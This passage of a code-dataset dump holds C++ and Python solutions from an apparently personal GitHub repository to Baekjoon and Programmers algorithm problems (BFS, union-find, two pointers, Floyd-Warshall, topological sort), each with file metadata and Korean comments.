cout.tie(0);\n int n, m, sum, maximum = -1;\n cin >> n >> m;\n\n int arr[n];\n\n for(int i = 0 ; i < n ; i++) cin >> arr[i];\n\n for(int i = 0 ; i < n-2 ; i++){\n for(int j = i + 1 ; j < n-1 ; j++){\n for(int k = j + 1 ; k < n ; k++){\n sum = arr[i] + arr[j] + arr[k];\n if(sum <= m && sum > 0){\n maximum = max(sum, maximum);\n }\n }\n }\n }\n\n cout << maximum;\n\n return 0;\n}" }, { "alpha_fraction": 0.3739902973175049, "alphanum_fraction": 0.394991934299469, "avg_line_length": 20, "blob_id": "d8572b8701de9f9cb0ca9c84789f47cc084cb925", "content_id": "7bede70cfdd65867c982b9c319c87b812134155a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1314, "license_type": "no_license", "max_line_length": 73, "num_lines": 59, "path": "/BOJ/Implementation/1039.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1039번: 교환\nDATE: 2021-10-16\n*/\n#include <iostream>\n#include <queue>\n#include <set>\nusing namespace std;\n\nvoid swap(string &str, int left, int right){\n char tmp = str[left];\n str[left] = str[right];\n str[right] = tmp;\n}\n\nint main(){\n queue<string> q;\n int n, k, ans = -1;\n cin >> n >> k;\n\n q.push(to_string(n));\n\n for(int i = 0 ; i < k ; i++){ \n set<string> s; \n int qsz = q.size();\n\n for(int j = 0 ; j < qsz ; j++){\n string cur = q.front();\n q.pop();\n\n if(s.count(cur) > 0) continue; //set에 존재하면 패스 (중복 제거) \n else(s.insert(cur));\n\n for(int s = 0 ; s < cur.length() ; s++){ //left\n for(int e = s + 1 ; e < cur.length() ; e++){ //right\n if(!(s == 0 && cur[e] == '0')){ //바꾼 수가 0으로 시작하면 안되므로\n swap(cur, s, e);\n q.push(cur);\n swap(cur, s, e); // 원래대로\n }\n }\n }\n }\n }\n\n while(!q.empty()){\n int num = stoi(q.front());\n ans = max(ans, num);\n q.pop();\n }\n\n if(ans < 10) //0으로 시작할 때\n cout << -1;\n else\n cout << ans;\n\n return 0;\n \n}" }, { "alpha_fraction": 0.4372217357158661, "alphanum_fraction": 0.4772929549217224, "avg_line_length": 19.071428298950195, "blob_id": "8433145fa7ab3fd9a1dca9a017c975ba59f03fb1", "content_id": "3e1d67e58867dca70becbb7e29e9e0c53121329a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1131, "license_type": "no_license", "max_line_length": 59, "num_lines": 56, "path": "/BOJ/Brute Force/2529.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2529번: 부등호\nDATE: 2021-03-04\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#define MAX 10\nusing namespace std;\n\nint k;\nint num[MAX] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9};\nvector <int> maxNum, minNum;\nchar arr[9];\n\nint check(vector<int> &v){\n for(int i = 0 ; i < k ; i++){\n if(arr[i] == '<' && v[i] > v[i+1]) return 1;\n else if(arr[i] == '>' && v[i] < v[i+1]) return 1;\n }\n return 0;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> k;\n\n for(int i = 0 ; i < k ; i++) cin >> arr[i];\n\n//max\n for(int i = 9 ; i >= 9-k ; i--) maxNum.push_back(i);\n\n while(1){\n if(check(maxNum)){\n prev_permutation(maxNum.begin(), maxNum.end());\n }\n else break;\n }\n\n//min\n for(int i = 0 ; i <= k ; i++) minNum.push_back(i);\n\n while(1){\n if(check(minNum)){\n next_permutation(minNum.begin(), minNum.end());\n }\n else break;\n }\n\n for(int i = 0 ; i < k+1 ; i++) cout << maxNum[i];\n cout << '\\n';\n for(int i = 0 ; i < k+1 ; i++) cout << minNum[i];\n cout << '\\n';\n\n return 0;\n}" }, { "alpha_fraction": 0.4058624505996704, "alphanum_fraction": 0.4239007830619812, "avg_line_length": 23, "blob_id": "df1af5f747b698754efb0ad21ec1a2944ae9086c", "content_id": "0cecfd062e065627474828afaa00cc00aeccdb76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 897, "license_type": "no_license", "max_line_length": 73, "num_lines": 37, "path": "/programmers/Level 2/string_compression.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers level 2: 문자열 압축\ndate: 2022-04-11\n*/\n#include <string>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint solution(string s) {\n int minVal = s.length(); \n \n for(int i = 1 ; i <= s.length() / 2 ; i++){\n string left, res;\n int cnt = 0;\n \n for(int j = 0 ; j <= s.length() ; j += i){\n string right = s.substr(j, i);\n \n if(left == right) cnt++;\n else if(cnt > 0){\n string tmp = to_string(cnt + 1) + left;\n right.length() >= i ? res += tmp : res += tmp + right;\n \n cnt = 0;\n } \n else right.length() == i ? res += left : res += left + right;\n \n left = right;\n }\n \n int leng = res.length();\n minVal = min(minVal, leng);\n }\n \n return minVal;\n}" }, { "alpha_fraction": 0.4382871389389038, "alphanum_fraction": 0.4609571695327759, "avg_line_length": 20.672727584838867, "blob_id": "6e55b08ffd8714e647e85acbb9c6eb7b5f9f4d78", "content_id": "d807be0990b8011a865dbe2b8f9a715f0b420679", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1233, "license_type": "no_license", "max_line_length": 66, "num_lines": 55, "path": "/BOJ/Two Pointer/2831.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2831번: 댄스 파티\nDATE: 2022-02-10\nTwo pointer\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n vector<int> posM, negM, posW, negW;\n int n, height;\n int a, b, ans = 0;\n cin >> n;\n\n for(int i = 0 ; i < n * 2 ; i++) {\n cin >> height;\n\n if(height < 0 && i < n) negM.push_back(abs(height));\n else if(height > 0 && i < n) posM.push_back(height);\n else if(height < 0 && i >= n) negW.push_back(abs(height));\n else if(height > 0 && i >= n) posW.push_back(height);\n }\n\n sort(negM.begin(), negM.end());\n sort(posM.begin(), posM.end());\n sort(negW.begin(), negW.end());\n sort(posW.begin(), posW.end());\n\n // 남자 양수 - 여자 음수\n a = 0; b = 0;\n while(a < posM.size() && b < negW.size()) {\n if(posM[a] < negW[b]) {\n ans++;\n a++; b++;\n }\n else b++;\n }\n\n // 남자 음수 - 여자 양수\n a = 0; b = 0;\n while(a < negM.size() && b < posW.size()) {\n if(negM[a] > posW[b]) {\n ans++;\n a++; b++;\n }\n else a++;\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.5106732249259949, "alphanum_fraction": 0.5418719053268433, "avg_line_length": 18.677419662475586, "blob_id": "d94b84ee17db37425fdeb9378c7970e5a473f854", "content_id": "c6f8ca30e3adc942e0b522c89d90694a3579a29d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 621, "license_type": "no_license", "max_line_length": 86, "num_lines": 31, "path": "/BOJ/Implementation/10814.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 10814번: 나이순 정렬\n2022-01-15\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nbool cmp(pair<int,string> a, pair<int,string> b) {\n return a.first < b.first;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n vector<pair<int,string>> vec;\n int n, age;\n string name;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n cin >> age >> name;\n vec.push_back({age, name});\n }\n\n stable_sort(vec.begin(), vec.end(), cmp);\n\n for(int i = 0 ; i < n ; i++) cout << vec[i].first << \" \" << vec[i].second << '\\n';\n\n return 0;\n}" }, { "alpha_fraction": 0.3915243446826935, "alphanum_fraction": 0.4218848943710327, "avg_line_length": 20.671232223510742, "blob_id": "82c3d12629a336f3d8d876c9200c812127b318c4", "content_id": "b11da7b506f72d5da3796f59b113816bf98b728b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1643, "license_type": "no_license", "max_line_length": 103, "num_lines": 73, "path": "/programmers/Level 2/check_the_distance.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 거리두기 확인하기\n2021-10-26\n2021 카카오 채용연계형 인턴십\n*/\n#include <string>\n#include <vector>\n#include <iostream>\n#include <string.h>\nusing namespace std;\n\nint dx[4] = {-1, 0, 1, 0};\nint dy[4] = {0, 1, 0, -1};\nbool visited[5][5];\nbool flag;\nvector<string> place;\n\nvoid dfs(int x, int y, int depth) {\n if(depth > 2) { \n return;\n }\n \n visited[x][y] = true;\n \n for(int i = 0 ; i < 4 ; i++) {\n int nx = x + dx[i];\n int ny = y + dy[i];\n \n if(nx < 0 || ny < 0 || nx >= 5 || ny >= 5 || visited[nx][ny] || place[nx][ny] == 'X') continue;\n if(place[nx][ny] == 'P' && depth < 2) { // 거리 2 이하에 사람 있으면 안됨\n flag = false;\n return;\n }\n dfs(nx, ny, depth + 1);\n }\n}\n\nbool func() {\n for(int i = 0 ; i < 5 ; i++) {\n for(int j = 0 ; j < 5 ; j++) {\n if(place[i][j] == 'P') {\n flag = true;\n memset(visited, false, sizeof(visited));\n dfs(i, j, 0);\n if(!flag) return false;\n }\n }\n }\n \n return true;\n}\n\nvector<int> solution(vector<vector<string>> places) {\n vector<int> answer;\n string str;\n \n for(int i = 0 ; i < 5 ; i++) {\n place.clear();\n \n for(int j = 0 ; j < 5 ; j++) {\n for(int k = 0 ; k < 5 ; k++) {\n str += places[i][j][k];\n }\n place.push_back(str);\n str.clear();\n }\n \n if(!func()) answer.push_back(0);\n else answer.push_back(1);\n }\n \n return answer;\n}" }, { "alpha_fraction": 0.45128780603408813, "alphanum_fraction": 0.4916013479232788, "avg_line_length": 21.923076629638672, "blob_id": "21ae3ac2740fee9b86be85339bd034295d2762cc", "content_id": "27a5893afd88f802ff47aaee00f8d4810611259b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 959, "license_type": "no_license", "max_line_length": 95, "num_lines": 39, "path": "/BOJ/Prefix Sum/14476.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 14476번: 최대공약수 하나 빼기\nDATE: 2022-01-24\nPrefix Sum\n*/\n#include <iostream>\n#define MAX 1000001\nusing namespace std;\n\nlong long arr[MAX], leftArr[MAX], rightArr[MAX];\n\nlong long gcd(long long a, long long b){\n return b ? gcd(b, a % b) : a;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, num;\n int max = -1, idx;\n cin >> n;\n\n for(int i = 1 ; i <= n ; i++) cin >> arr[i];\n for(int i = 1 ; i <= n ; i++) leftArr[i] = gcd(arr[i], leftArr[i - 1]); // 왼쪽부터 최대공약수 누적\n for(int i = n ; i >= 1 ; i--) rightArr[i] = gcd(arr[i], rightArr[i + 1]); // 오른쪽부터 최대공약수 누적\n\n for(int i = 1 ; i <= n ; i++){\n num = gcd(leftArr[i - 1], rightArr[i + 1]);\n\n if(num > max && arr[i] % num != 0) {\n max = num;\n idx = i;\n }\n }\n\n if(max == -1) cout << -1;\n else cout << max << \" \" << arr[idx];\n\n return 0;\n}" }, { "alpha_fraction": 0.4491434693336487, "alphanum_fraction": 0.4657387435436249, "avg_line_length": 20.482759475708008, "blob_id": "337c983f28736bfffefc100626dfbb5240183770", "content_id": "d45bf5fe8713bd27e2c982853d6129e9add30285", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1956, "license_type": "no_license", "max_line_length": 86, "num_lines": 87, "path": "/BOJ/Graph Theory/1043.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1043번: 거짓말\n2021-12-26\nUnion-Find\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint getParent(int parent[], int x) {\n if(parent[x] == x) return x;\n return parent[x] = getParent(parent, parent[x]);\n}\n\nvoid unionParent(int parent[], int a, int b) {\n a = getParent(parent, a);\n b = getParent(parent, b);\n if(a < b) parent[b] = a;\n else parent[a] = b;\n}\n\nint findParent(int parent[], int a, int b) {\n a = getParent(parent, a);\n b = getParent(parent, b);\n if(a == b) return 1;\n else return 0;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n vector<int> truth, tmp;\n vector<vector<int>> party;\n int n, m, truthNum; //사람 수, 파티 수, 진실을 아는 사람의 수\n int total, num, ans = 0;\n bool flag;\n cin >> n >> m >> truthNum;\n\n if(truthNum == 0) { // 진실을 아는 사람이 한 명도 없을 때\n cout << m;\n return 0;\n }\n\n int parent[n + 1];\n\n for(int i = 1 ; i <= n ; i++) parent[i] = i;\n\n for(int i = 0 ; i < truthNum ; i++) {\n cin >> num;\n truth.push_back(num); // 진실을 아는 사람들의 번호\n }\n\n for(int i = 0 ; i < m ; i++) {\n cin >> total;\n\n for(int j = 0 ; j < total ; j++) {\n cin >> num;\n tmp.push_back(num);\n }\n\n party.push_back(tmp);\n \n for(int j = 1 ; j < tmp.size() ; j++) unionParent(parent, tmp[j - 1], tmp[j]);\n\n tmp.clear();\n }\n\n for(int i = 0 ; i < party.size() ; i++) {\n flag = true;\n\n for(int j = 0 ; j < party[i].size() ; j++) {\n for(int k = 0 ; k < truth.size() ; k++) {\n if(findParent(parent, party[i][j], truth[k])){\n flag = false;\n break;\n }\n if(!flag) break;\n }\n }\n\n if(flag) ans++;\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4567541182041168, "alphanum_fraction": 0.4839650094509125, "avg_line_length": 19.19607925415039, "blob_id": "e46ae713f119c624538d165e2db696f133d087d9", "content_id": "34f3b43c2f55df0b0d1333c8cd336b4854f6a4fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1057, "license_type": "no_license", "max_line_length": 71, "num_lines": 51, "path": "/BOJ/BFS_DFS/5014.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 5014번: 스타트링크\nDATE: 2022-04-28\nBFS\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\n\nint F, S, G, U, D;\nbool visited[1000001];\n\nvoid bfs(int S){\n queue<pair<int,int>> q;\n q.push({S, 0});\n visited[S] = true;\n \n while(!q.empty()){\n int floor = q.front().first;\n int cnt = q.front().second;\n q.pop();\n\n if(floor == G) {\n cout << cnt;\n return;\n }\n\n int upstairs = floor + U;\n int downstairs = floor - D;\n\n if(upstairs > 0 && upstairs <= F && !visited[upstairs]) {\n q.push({upstairs, cnt + 1});\n visited[upstairs] = true;\n }\n if(downstairs > 0 && downstairs <= F && !visited[downstairs]) {\n q.push({downstairs, cnt + 1});\n visited[downstairs] = true;\n }\n }\n\n cout << \"use the stairs\";\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> F >> S >> G >> U >> D; // 총 F층, 현재 층, 도착 층, Up, Down\n\n bfs(S);\n\n return 0;\n}" }, { "alpha_fraction": 0.5967742204666138, "alphanum_fraction": 0.6451612710952759, "avg_line_length": 18.153846740722656, "blob_id": "d9d033352c76bfb5e6c366ae545b041243f88861", "content_id": "fce5c9caa4be0ea8aca041138ec3e0155482ca80", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 264, "license_type": "no_license", "max_line_length": 48, "num_lines": 13, "path": "/programmers/Level 1/pick_two_and_add.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# programmers Level 1: 두 개 뽑아서 더하기\n# date: 2022-04-14\nimport itertools\n\ndef solution(numbers):\n answer = []\n\n for i in itertools.combinations(numbers, 2):\n answer.append(i[0] + i[1])\n\n answer = sorted(set(answer))\n\n return answer" }, { "alpha_fraction": 0.4154103994369507, "alphanum_fraction": 0.47236180305480957, "avg_line_length": 18.933332443237305, "blob_id": "e93242cbcc880cb791a3871be2e5f1ca3e0acac5", "content_id": "4d8d3e5d7149be1998cd0fbf4ed60c3523950181", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 603, "license_type": "no_license", "max_line_length": 60, "num_lines": 30, "path": "/programmers/Level 1/gym_clothes.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 1: 체육복\ndate: 2021-04-28\nupdate: 2022-04-28\n*/\n#include <string>\n#include <vector>\nusing namespace std;\n\nint arr[31];\n\nint solution(int n, vector<int> lost, vector<int> reserve) {\n int answer = 0;\n \n for(auto i : lost) arr[i] -= 1;\n for(auto i : reserve) arr[i] += 1;\n \n for(int i = 1 ; i < n ; i++){\n if(arr[i] == -1){\n if(arr[i-1] == 1) arr[i] = arr[i-1] = 0;\n else if(arr[i+1] == 1) arr[i] = arr[i+1] = 0;\n }\n }\n \n for(int i = 1 ; i <= n ; i++){\n if(arr[i] > -1) answer++;\n }\n \n return answer;\n}" }, { "alpha_fraction": 0.33221250772476196, "alphanum_fraction": 0.3665097653865814, "avg_line_length": 18.324674606323242, "blob_id": "8f699b2810ecd2d568366b40f8f44fa5a34e9b5a", "content_id": "18fc5c709ff21bd98ce55c9f5e3806aeb83b2891", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1575, "license_type": "no_license", "max_line_length": 79, "num_lines": 77, "path": "/BOJ/Implementation/14503.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 14503번: 로봇 청소기\nDATE: 2022-02-04\nImplementation\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\n\nint n, m, ans;\nint arr[51][51];\nint dx[4] = {-1, 0, 1, 0}; \nint dy[4] = {0, 1, 0, -1};\nint x, y, d;\n\nint getDir(int d) {\n if(d == 0) return 3;\n else if(d == 1) return 0;\n else if(d == 2) return 1;\n else return 2;\n}\n\nvoid solve(){\n while(1){\n bool flag = false;\n\n if(!arr[x][y]){\n arr[x][y] = 2; // 청소 완료\n ans++;\n }\n \n for(int i = 0 ; i < 4 ; i++) {\n d = getDir(d);\n int nx = x + dx[d];\n int ny = y + dy[d];\n\n if(nx < 0 || ny < 0 || nx >= n || ny >= m || arr[nx][ny]) continue;\n \n x = nx;\n y = ny;\n flag = true;\n\n break;\n }\n\n if(!flag) { // 네 방향 모두 청소가 이미 되어있거나 벽인 경우\n int nd = (d + 2) % 4; // 후진 할 방향\n int nx = x + dx[nd];\n int ny = y + dy[nd];\n\n if(nx < 0 || ny < 0 || nx >= n || ny >= m) continue;\n\n if(arr[nx][ny] != 1) { // 후진 가능 (방향은 그대로)\n x = nx;\n y = ny;\n }\n else return;\n }\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n >> m;\n cin >> x >> y >> d;\n\n for(int i = 0 ; i < n ; i++){\n for(int j = 0 ; j < m ; j++){\n cin >> arr[i][j];\n }\n }\n\n solve();\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.46423017978668213, "alphanum_fraction": 0.4914463460445404, "avg_line_length": 21.578947067260742, "blob_id": "31facdaec411a89c9401de3355cbcfbe22dae817", "content_id": "f5d2a432fa4856dfa0224912b149a19a11445794", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1438, "license_type": "no_license", "max_line_length": 90, "num_lines": 57, "path": "/BOJ/BFS_DFS/14226.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 14226번: 이모티콘\nDATE: 2021-01-25\nBFS\n*/\n#include <iostream>\n#include <queue>\n#define MAX 1001\nusing namespace std;\n\nint visited[MAX][MAX] = { 0, };\n\nint main()\n{\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\n int s;\n cin >> s;\n\n queue<pair<int, int>> q; //(화면 출력 개수, 클립보드 개수)\n pair<int, int> p;\n\n q.push(make_pair(1, 0));\n visited[1][0] = 1;\n\n while (!q.empty())\n {\n p = q.front();\n int monitor = p.first;\n int cb = p.second;\n q.pop();\n\n if (monitor == s)\n {\n cout << visited[monitor][cb]-1;\n break;\n }\n \n if (!visited[monitor][monitor]) //화면에 있는 이모티콘을 모두 복사해서 클립보드에 저장\n {\n q.push(make_pair(monitor, monitor));\n visited[monitor][monitor] = visited[monitor][cb] + 1;\n }\n if (monitor + cb < MAX && !visited[monitor + cb][cb]) //클립보드에 있는 모든 이모티콘을 화면에 붙여넣기\n {\n q.push(make_pair(monitor + cb, cb));\n visited[monitor + cb][cb] = visited[monitor][cb] + 1;\n }\n if (monitor > 0 && !visited[monitor - 1][cb]) //화면에 있는 이모티콘 중 하나를 삭제\n {\n q.push(make_pair(monitor - 1, cb));\n visited[monitor - 1][cb] = visited[monitor][cb] + 1;\n }\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.4117647111415863, "alphanum_fraction": 0.46740859746932983, "avg_line_length": 16.027027130126953, "blob_id": "e38c3c9550ed1bfd175c8a0ae750ad94aa523fcf", "content_id": "9ef49084b4dc78aa8757fcac2423bcb1778dc90a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 687, "license_type": "no_license", "max_line_length": 58, "num_lines": 37, "path": "/BOJ/Graph Theory/17073.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 17073번: 나무 위의 빗물\nDATE: 2021-01-21\n*/\n#include <iostream>\n#include <queue>\n#define NODE_MAX 500000\n\nusing namespace std;\n\nint edge[NODE_MAX] = { 0, };\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\n int n;\n double w, leaf=0;\n cin >> n >> w;\n\n for (int i = 0; i < n - 1; i++) {\n int u, v;\n cin >> u >> v;\n edge[u - 1]++;\n edge[v - 1]++;\n }\n\n for (int i = 1 ; i < n; i++) { \n if (edge[i] == 1) //부모 노드와만 연결 되었다면 leaf\n leaf++;\n }\n\n cout << fixed; //소수점 고정\n cout.precision(10); //소수점 10자리\n cout << w / leaf;\n\n return 0;\n}" }, { "alpha_fraction": 0.41525423526763916, "alphanum_fraction": 0.45338982343673706, "avg_line_length": 16.830188751220703, "blob_id": "a6f1e8da0ae429b93595eff13f175e27b01111d8", "content_id": "de7b3bcc519d4ad65898fa18ad04bcceeeebdde3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 946, "license_type": "no_license", "max_line_length": 58, "num_lines": 53, "path": "/BOJ/Graph Theory/2252.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//BOJ 2252번: 줄 세우기\n//2021-07-12\n//Topology Sort\n#include <iostream>\n#include <queue>\n#include <vector>\n#define MAX 100000\nusing namespace std;\n\nint n, inDegree[MAX];\nvector<int> v[MAX];\n\nvoid topologySort(){\n int result[n];\n queue<int> q;\n\n for(int i = 1 ; i <= n ; i++){\n if(inDegree[i] == 0) q.push(i);\n }\n\n for(int i = 0 ; i < n ; i++){\n int x = q.front();\n q.pop();\n result[i] = x;\n\n for(int j = 0 ; j < v[x].size() ; j++){\n int y = v[x][j];\n if(--inDegree[y] == 0) q.push(y);\n }\n }\n\n for(int i = 0 ; i < n ; i++){\n cout << result[i] << \" \";\n }\n\n return;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int m, num1, num2;\n cin >> n >> m;\n \n for(int i = 0 ; i < m ; i++){\n cin >> num1 >> num2;\n v[num1].push_back(num2);\n inDegree[num2]++;\n }\n\n topologySort();\n\n return 0;\n}" }, { "alpha_fraction": 0.4667896628379822, "alphanum_fraction": 0.5055350661277771, "avg_line_length": 14.970588684082031, "blob_id": "21774e653168188a8de49baa59d09b8aab518034", "content_id": "e04afa0a4b67c061ad5ebf3fb5014d83d8bc25f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 552, "license_type": "no_license", "max_line_length": 58, "num_lines": 34, "path": "/BOJ/Mathematics/1978.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1978번: 소수 찾기\nDATE: 2021-10-09\n*/\n#include <iostream>\n#include <vector>\n#include <math.h>\nusing namespace std;\n\nbool isPrime(int num) {\n if (num < 2) return false;\n\n for(int i = 2 ; i <= sqrt(num) ; i++) {\n if(num % i == 0) return false;\n }\n\n return true;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, num, cnt = 0;\n vector<int> v;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++) {\n cin >> num;\n if(isPrime(num)) cnt++;\n }\n\n cout << cnt;\n\n return 0;\n}" }, { "alpha_fraction": 0.37490609288215637, "alphanum_fraction": 0.41622841358184814, "avg_line_length": 18.02857208251953, "blob_id": "6736ff7e104355d61d2f86bf1b5957d1a592173f", "content_id": "863ad4f996ccae49e9aeb3e61078ad5037dcfe95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1373, "license_type": "no_license", "max_line_length": 58, "num_lines": 70, "path": "/BOJ/Implementation/1062.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1062번: 가르침\nDATE: 2021-10-20\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nvector<string> words;\nint k, ans = 0;\nint alpha[26] = {0,};\n\nvoid combination(int depth, int next) {\n if(depth == k - 5) { //a n t i c를 제외한 조합\n int cnt = 0;\n\n for(int i = 0 ; i < words.size() ; i++) {\n bool flag = true;\n for(int j = 0 ; j < words[i].length() ; j++) {\n if(alpha[words[i][j] - 97] == 0){\n flag = false;\n break;\n }\n }\n if(flag) cnt++;\n }\n\n ans = max(ans, cnt);\n\n return;\n }\n\n for(int i = next ; i < 26 ; i++) {\n if(alpha[i] == 1) continue;\n\n alpha[i] = 1;\n combination(depth + 1, i + 1);\n alpha[i] = 0;\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n;\n string word;\n cin >> n >> k;\n\n if(k < 5) { // 모든 단어가 a n t i c를 포함하므로\n cout << \"0\";\n return 0;\n }\n \n alpha['a' - 97] = 1;\n alpha['n' - 97] = 1;\n alpha['t' - 97] = 1;\n alpha['i' - 97] = 1;\n alpha['c' - 97] = 1;\n\n for(int i = 0 ; i < n ; i++) {\n cin >> word;\n words.push_back(word);\n }\n \n combination(0, 0);\n\n cout << ans;\n \n return 0;\n}" }, { "alpha_fraction": 0.3930753469467163, "alphanum_fraction": 0.42362526059150696, "avg_line_length": 19.914894104003906, "blob_id": "a2dd1a8be42b32a64e2403d01f91076bf0ca7333", "content_id": "c058dcdab7efa0ededd0d42ff703908ac9a04d74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 988, "license_type": "no_license", "max_line_length": 88, "num_lines": 47, "path": "/BOJ/Graph Theory/1956.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1956번: 운동\nDATE: 2022-03-04\nFloyd-Warshall Algorithm\n*/\n#include <iostream>\n#include <algorithm>\n#define MAX 401\n#define INF 1e9\nusing namespace std;\n\nint arr[MAX][MAX];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int v, e;\n int a, b, c;\n int minVal = INF;\n cin >> v >> e;\n\n fill(&arr[0][0], &arr[v][v], INF);\n\n for(int i = 0 ; i < e ; i++){\n cin >> a >> b >> c;\n arr[a][b] = min(arr[a][b], c);\n }\n\n for(int k = 1 ; k <= v ; k++){\n for(int i = 1 ; i <= v ; i++){\n for(int j = 1 ; j <= v ; j++){\n if(arr[i][k] + arr[k][j] < arr[i][j]) arr[i][j] = arr[i][k] + arr[k][j];\n }\n }\n }\n\n for(int i = 1 ; i <= v ; i++){\n for(int j = 1 ; j <= v ; j++){\n if(i == j || arr[i][j] == INF) continue;\n minVal = min(minVal, arr[i][j] + arr[j][i]);\n }\n }\n\n if(minVal == INF) cout << -1;\n else cout << minVal;\n\n return 0;\n}" }, { "alpha_fraction": 0.41017964482307434, "alphanum_fraction": 0.46856287121772766, "avg_line_length": 16.153846740722656, "blob_id": "23905d28da44ea5ab3322df6ee88cb7199e65287", "content_id": "609f012791f7c6980433af6d885ce9532ff512c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 676, "license_type": "no_license", "max_line_length": 58, "num_lines": 39, "path": "/BOJ/Two Pointer/1806.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1806번: 부분합\nDATE: 2021-06-01\nTwo Pointer\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint arr[100001];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int start=0, end=0, sum=0;\n int length = 100001;\n int n, s;\n cin >> n >> s;\n\n for(int i = 0 ; i < n ; i++){\n cin >> arr[i];\n }\n\n while(end <= n){\n if(sum >= s){\n int dst = end - start;\n length = min(length, dst);\n\n sum -= arr[start++];\n }\n else if(sum < s){\n sum += arr[end++];\n }\n }\n\n if(length == 100001) cout << 0;\n else cout << length;\n\n return 0;\n}" }, { "alpha_fraction": 0.4037266969680786, "alphanum_fraction": 0.4551907777786255, "avg_line_length": 21.559999465942383, "blob_id": 